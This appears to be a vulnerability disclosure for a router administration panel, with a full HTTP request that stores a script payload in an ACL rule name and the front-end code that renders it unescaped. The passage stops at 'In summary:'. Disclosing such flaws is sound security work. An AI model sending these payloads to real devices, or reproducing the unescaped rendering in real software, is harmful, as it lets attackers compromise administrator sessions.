XSS attacks are possible in the "Advanced - Remote Access - ACL Configuration" section of the administrator panel.
POST /ubus HTTP/1.1
Host: 125.186.175.246
Content-Length: 191
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: <http://125.186.175.246>
Referer: <http://125.186.175.246/remoteAccess.html>
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
{"jsonrpc":"2.0","id":2,"method":"call","params":["925d1c69160526e187bf3acf1c7692ff","routerd","remote_acl_set",{"type":3,"name":"<script>alert('XSS')</script>","ip":"132.122.222.222","mask":"255.255.255.255"}]}
The remoteAccess.html code receives the rule name as input.
<div class="form-group clearfix">
<label class="col-xs-6 col-sm-4 col-md-4 col-lg-5 f-label">규칙 이름</label>
<div class="col-xs-6 col-sm-8 col-md-8 col-lg-7 f-control">
<input type="text" class="form-control" id="rule_name" name="rule_name" />
</div>
</div>
It is then inserted into the HTML in remoteAccess.js without any escaping.
function acl_get_rules() {
var req = {
"jsonrpc": "2.0",
"id": 2,
"method": "call",
"params": [
localStorage.getItem('token_id'),
"routerd",
"acl_rules_get",
{}
]
};
request({
url: "/ubus",
data: JSON.stringify(req)
}).done(function (data) {
if (check_data(data)) {
// Display the ACL rule list on the screen.
var ruleList = data.result[1].rules || [];
render_acl_table(ruleList);
}
});
}
function render_acl_table(list) {
var htmlStr = "";
list.forEach(function (item) {
// Insert the rule name directly into the table (e.g., XSS vulnerability point).
htmlStr += "<tr>";
htmlStr += "<td>" + item.rule_name + "</td>"; //This is the issue.
htmlStr += "<td>" + item.action + "</td>";
htmlStr += "<td>" + item.port + "</td>";
htmlStr += "</tr>";
});
$("#acl_table_body").html(htmlStr);
}
In summary: